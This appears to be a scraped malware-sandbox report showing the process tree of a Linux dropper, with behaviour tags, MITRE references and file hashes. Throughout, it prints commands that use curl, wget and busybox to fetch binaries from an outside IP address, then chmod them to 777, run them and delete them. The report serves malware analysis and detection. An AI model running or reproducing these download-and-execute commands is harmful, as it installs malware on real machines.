/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:944
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:950
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:956
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:962
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:968
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:974
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:980
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97